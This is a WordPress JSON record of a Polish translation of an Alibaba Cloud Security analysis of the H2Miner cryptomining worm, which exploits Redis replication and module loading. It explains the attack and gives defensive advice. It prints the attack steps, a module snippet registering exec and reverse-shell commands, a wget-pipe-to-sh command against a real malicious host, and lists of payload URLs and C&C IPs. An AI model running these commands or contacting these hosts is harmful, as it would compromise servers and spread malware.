{"id":55714,"date":"2020-01-27T00:00:00","date_gmt":"2020-01-26T21:00:00","guid":{"rendered":"https:\/\/prohoster.info\/blog\/blog_prohoster\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce"},"modified":"2020-02-18T14:03:51","modified_gmt":"2020-02-18T11:03:51","slug":"obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","status":"publish","type":"post","link":"https:\/\/prohoster.info\/pl\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","title":{"rendered":"Wykryto now\u0105 fal\u0119 robak\u00f3w H2Miner, kt\u00f3re wykorzystuj\u0105 Redis RCE.","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<blockquote><p>Dzie\u0144 temu jeden z serwer\u00f3w mojego projektu zosta\u0142 zaatakowany przez podobnego robaka. Szukaj\u0105c odpowiedzi na pytanie \u201eco to by\u0142o?\u201d, natkn\u0105\u0142em si\u0119 na wspania\u0142y artyku\u0142 zespo\u0142u Alibaba Cloud Security. Poniewa\u017c nie znalaz\u0142em tego artyku\u0142u na Habrze, postanowi\u0142em go przet\u0142umaczy\u0107 specjalnie dla was &lt;3\n<\/p><\/blockquote>\n<h2>Wprowadzenie<\/h2>\n<p>\nNiedawno zesp\u00f3\u0142 bezpiecze\u0144stwa Alibaba Cloud odkry\u0142 nag\u0142y wzrost H2Miner. Ten typ z\u0142o\u015bliwego robaka wykorzystuje brak autoryzacji lub s\u0142abe has\u0142a do Redis jako bramy do twoich system\u00f3w, a nast\u0119pnie synchronizuje sw\u00f3j z\u0142o\u015bliwy modu\u0142 z slave za pomoc\u0105 synchronizacji master-slave i w ko\u0144cu wgrywa ten z\u0142o\u015bliwy modu\u0142 na zaatakowan\u0105 maszyn\u0119, wykonuj\u0105c z\u0142o\u015bliwe instrukcje.<\/p>\n<p>W przesz\u0142o\u015bci ataki na twoje systemy zazwyczaj by\u0142y przeprowadzane przy u\u017cyciu metody obejmuj\u0105cej zaplanowane zadania lub klucze SSH, kt\u00f3re by\u0142y zapisywane na twojej maszynie po zalogowaniu si\u0119 w\u0142amywacza do Redis. Na szcz\u0119\u015bcie ta metoda rzadko si\u0119 udaje z powodu problem\u00f3w z kontrol\u0105 uprawnie\u0144 lub r\u00f3\u017cnych wersji systemu. Niemniej jednak, ta metoda \u0142adowania z\u0142o\u015bliwego modu\u0142u mo\u017ce bezpo\u015brednio wykonywa\u0107 komendy atakuj\u0105cego lub uzyskiwa\u0107 dost\u0119p do pow\u0142oki, co jest niebezpieczne dla twojego systemu.<\/p>\n<p>Z powodu du\u017cej liczby <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/pl\/server\/\"   title=\"serwer\u00f3w\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"1464\">serwer\u00f3w<\/a> Redis, kt\u00f3re s\u0105 hostowane w internecie (prawie 1 milion), zesp\u00f3\u0142 bezpiecze\u0144stwa Alibaba Cloud, przypominaj\u0105c przyja\u017anie, zaleca u\u017cytkownikom, aby nie udost\u0119pnia\u0107 dost\u0119pu do Redis z sieci oraz regularnie sprawdza\u0107 solidno\u015b\u0107 swoich hase\u0142, a tak\u017ce, czy nie s\u0105 one nara\u017cone na szybkie \u0142amanie.<\/p>\n<h2>H2Miner<\/h2>\n<p>\nH2Miner to botnet do wydobywania danych dla system\u00f3w opartych na Linuksie, kt\u00f3ry mo\u017ce wnika\u0107 do twojego systemu na kilka sposob\u00f3w, w tym przez brak autoryzacji w Hadoop yarn, Docker oraz przez podatno\u015b\u0107 na zdalne wykonanie komend Redis (RCE). Botnet dzia\u0142a poprzez \u0142adowanie z\u0142o\u015bliwych skrypt\u00f3w i program\u00f3w do wydobywania twoich danych, poziome rozszerzenie ataku oraz utrzymywanie \u0142\u0105czno\u015bci dowodzenia i kontroli (C&amp;C).<br \/>\n<noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<h2>Redis RCE<\/h2>\n<p>\nPawel Toporkov podzieli\u0142 si\u0119 wiedz\u0105 na ten temat na ZeroNights 2018. Po wersji 4.0, Redis obs\u0142uguje funkcj\u0119 \u0142adowania zewn\u0119trznych modu\u0142\u00f3w, kt\u00f3ra pozwala u\u017cytkownikom \u0142adowa\u0107 pliki so, skompilowane w C, do Redis w celu wykonania okre\u015blonych komend Redis. Funkcja ta, chocia\u017c przydatna, zawiera luk\u0119, w kt\u00f3rej w trybie master-slave pliki mog\u0105 by\u0107 synchronizowane z slave za pomoc\u0105 pe\u0142nej synchronizacji. Mo\u017ce to by\u0107 wykorzystane przez atakuj\u0105cego do przesy\u0142ania z\u0142o\u015bliwych plik\u00f3w so. Po zako\u0144czeniu transferu, cyberprzest\u0119pcy \u0142aduj\u0105 modu\u0142 do zaatakowanej instancji Redis i wykonuj\u0105 dowoln\u0105 komend\u0119.<\/p>\n<h2>Analiza z\u0142o\u015bliwego robaka<\/h2>\n<p>\nNiedawno zesp\u00f3\u0142 zabezpiecze\u0144 Alibaba Cloud odkry\u0142, \u017ce liczba z\u0142o\u015bliwych g\u00f3rnik\u00f3w H2Miner nagle wzros\u0142a. Zgodnie z analiz\u0105, og\u00f3lny proces powstawania ataku wygl\u0105da nast\u0119puj\u0105co:<\/p>\n<p><img decoding=\"async\" alt=\"Wykryto now\u0105 fal\u0119 robak\u00f3w H2Miner, kt\u00f3re wykorzystuj\u0105 Redis RCE.\" src=\"\/wp-content\/uploads\/2020\/01\/e4e47a0ddb0bd9f8d97dd992f3349016.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nH2Miner wykorzystuje RCE Redisa do pe\u0142nego ataku. Najpierw cyberprzest\u0119pcy atakuj\u0105 niezabezpieczone serwery Redis lub serwery z s\u0142abymi has\u0142ami.<\/p>\n<p>Nast\u0119pnie u\u017cywaj\u0105 komendy <code>config set dbfilename red2.so<\/code> aby zmieni\u0107 nazw\u0119 pliku. Po tym atakuj\u0105cy wykonuj\u0105 komend\u0119 <code>slaveof<\/code> aby ustawi\u0107 adres hosta replikacji master-slave. <\/p>\n<p>Gdy zaatakowana instancja Redis \u0142\u0105czy si\u0119 w trybie master-slave z z\u0142o\u015bliwym Redis, kt\u00f3ry nale\u017cy do atakuj\u0105cego, wysy\u0142a on zara\u017cony modu\u0142 za pomoc\u0105 komendy pe\u0142nej synchronizacji, aby zsynchronizowa\u0107 pliki. Nast\u0119pnie plik red2.so zostanie za\u0142adowany na zaatakowan\u0105 maszyn\u0119. Po tym cyberprzest\u0119pcy u\u017cywaj\u0105 modu\u0142u .\/red2.so, aby za\u0142adowa\u0107 ten plik so. Modu\u0142 mo\u017ce wykonywa\u0107 polecenia atakuj\u0105cego lub inicjowa\u0107 po\u0142\u0105czenie zwrotne (backdoor), aby uzyska\u0107 dost\u0119p do zaatakowanej maszyny.<\/p>\n<pre><code class=\"plaintext\">if (RedisModule_CreateCommand(ctx, \"system.exec\",\n        DoCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n      if (RedisModule_CreateCommand(ctx, \"system.rev\",\n        RevShellCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n<\/code><\/pre>\n<p>\nPo wykonaniu z\u0142o\u015bliwej komendy, takiej jak <code>\/ bin \/ sh -c wget -q -O-http:\/\/195.3.146.118\/unk.sh | sh&gt; \/ dev \/ null 2&gt; &amp; 1<\/code>, cyberprzest\u0119pca zresetuje nazw\u0119 pliku kopii zapasowej i wy\u0142adowa\u0142 systemowy modu\u0142, aby wyczy\u015bci\u0107 \u015blady. Niemniej jednak plik red2.so nadal pozostanie na zaatakowanej maszynie. U\u017cytkownicy s\u0105 zach\u0119cani do zwracania uwagi na obecno\u015b\u0107 takiego podejrzanego pliku w folderze ich instancji Redis.<\/p>\n<p>Opr\u00f3cz eliminacji niekt\u00f3rych z\u0142o\u015bliwych proces\u00f3w w celu kradzie\u017cy zasob\u00f3w, atakuj\u0105cy podj\u0105\u0142 z\u0142o\u015bliw\u0105 akcj\u0119, \u0142aduj\u0105c i uruchamiaj\u0105c z\u0142o\u015bliwe pliki w postaci binarnej, aby <noindex><a rel=\"nofollow\" href=\"http:\/\/142.44.191.122\/kinsing\">142.44.191.122\/kinsing<\/a><\/noindex>. Oznacza to, \u017ce nazwa procesu lub katalogu zawieraj\u0105ca kinsing na ho\u015bcie mo\u017ce wskazywa\u0107, \u017ce ta maszyna zosta\u0142a zainfekowana tym wirusem.<\/p>\n<p>Zgodnie z wynikami analizy wstecznej z\u0142o\u015bliwe oprogramowanie g\u0142\u00f3wnie wykonuje nast\u0119puj\u0105ce funkcje:<\/p>\n<ul>\n<li>\u0141adowanie i uruchamianie plik\u00f3w<\/li>\n<li>Kopanie<\/li>\n<li>Utrzymywanie komunikacji C&amp;C i wykonywanie polece\u0144 atakuj\u0105cego<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"Wykryto now\u0105 fal\u0119 robak\u00f3w H2Miner, kt\u00f3re wykorzystuj\u0105 Redis RCE.\" src=\"\/wp-content\/uploads\/2020\/01\/43229670fd28e4b7f1974aa3c36dc3ca.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nU\u017cyj masscan do skanowania zewn\u0119trznego, aby zwi\u0119kszy\u0107 zasi\u0119g. Dodatkowo adres IP serwera C&amp;C jest mocno zaszyfrowany w programie, a atakowany host b\u0119dzie komunikowa\u0107 si\u0119 z serwerem C&amp;C za pomoc\u0105 \u017c\u0105da\u0144 HTTP, gdzie informacje o zombie (z\u0142amanym serwerze) s\u0105 identyfikowane w nag\u0142\u00f3wku HTTP.<\/p>\n<p><img decoding=\"async\" alt=\"Wykryto now\u0105 fal\u0119 robak\u00f3w H2Miner, kt\u00f3re wykorzystuj\u0105 Redis RCE.\" src=\"\/wp-content\/uploads\/2020\/01\/111ba916fa76f45fe458622f260b1d8e.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<pre><code class=\"plaintext\">GET \/h HTTP\/1.1\nHost: 91.215.169.111\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/78.0.3904.108 Safari\/537.36\nArch: amd64\nCores: 2\nMem: 3944\nOs: linux\nOsname: debian\nOsversion: 10.0\nRoot: false\nS: k\nUuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\nVersion: 26\nAccept-Encoding: gzip\n<\/code><\/pre>\n<p><\/p>\n<h2>Inne metody atak\u00f3w<\/h2>\n<p>\n<img decoding=\"async\" alt=\"Wykryto now\u0105 fal\u0119 robak\u00f3w H2Miner, kt\u00f3re wykorzystuj\u0105 Redis RCE.\" src=\"\/wp-content\/uploads\/2020\/01\/51c088251ac8fd71d229bfe96e239c29.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h2>Adresy i linki u\u017cywane przez robaka<\/h2>\n<p>\n\/kinsing<\/p>\n<pre><code class=\"plaintext\">\u2022 142.44.191.122\/t.sh\n\u2022 185.92.74.42\/h.sh\n\u2022 142.44.191.122\/spr.sh\n\u2022 142.44.191.122\/spre.sh\n\u2022 195.3.146.118\/unk.sh\n<\/code><\/pre>\n<p>\nc&amp;c<\/p>\n<pre><code class=\"plaintext\">\u2022 45.10.88.102\n\u2022 91.215.169.111\n\u2022 139.99.50.255\n\u2022 46.243.253.167\n\u2022 195.123.220.193\n<\/code><\/pre>\n<p><\/p>\n<h2>Rada<\/h2>\n<p>\nPo pierwsze, Redis nie powinien by\u0107 otwarty na dost\u0119p z Internetu i powinien by\u0107 chroniony silnym has\u0142em. Wa\u017cne jest r\u00f3wnie\u017c, aby klienci sprawdzali, czy w katalogu Redis nie ma pliku red2.so oraz czy w nazwie pliku\/procesu na ho\u015bcie nie ma \"kinsing\".<br \/>\n<br \/>\u0179r\u00f3d\u0142o: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/post\/485300\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u044f \u043d\u0435 \u043d\u0430\u0448\u0435\u043b \u044d\u0442\u043e\u0442 \u0441\u0442\u0430\u0442\u044c\u0438 \u043d\u0430 \u0445\u0430\u0431\u0440\u0435, \u0442\u043e \u0440\u0435\u0448\u0438\u043b \u043f\u0435\u0440\u0435\u0432\u0435\u0441\u0442\u0438 \u0435\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u0432\u0430\u0441 &lt;3 \u0412\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435 \u041d\u0435\u0434\u0430\u0432\u043d\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Alibaba Cloud \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u0443\u044e \u0432\u0441\u043f\u044b\u0448\u043a\u0443 H2Miner. [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-55714","post","type-post","status-publish","format-standard","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.1.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/pl\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.1.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"pl_PL\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/pl\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2020-01-26T21:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2020-02-18T11:03:51+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Wykryto now\u0105 fal\u0119 robak\u00f3w H2Miner, kt\u00f3re eksploatuj\u0105 Redis RCE | ProHoster","description":"Dzie\u0144 temu jeden z serwer\u00f3w mojego projektu zosta\u0142 zaatakowany przez podobnego robaka. W poszukiwaniu odpowiedzi na pytanie \"co to by\u0142o?\" znalaz\u0142em wspania\u0142y artyku\u0142 zespo\u0142u Alibaba Cloud Security.","canonical_url":"https:\/\/prohoster.info\/pl\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"pl_PL","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster","og:description":"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.","og:url":"https:\/\/prohoster.info\/pl\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2020-01-26T21:00:00+00:00","article:modified_time":"2020-02-18T11:03:51+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"55714","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 19:38:31","updated":"2026-02-09 16:50:17","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/posts\/55714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/comments?post=55714"}],"version-history":[{"count":1,"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/posts\/55714\/revisions"}],"predecessor-version":[{"id":158708,"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/posts\/55714\/revisions\/158708"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/media?parent=55714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/categories?post=55714"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/tags?post=55714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}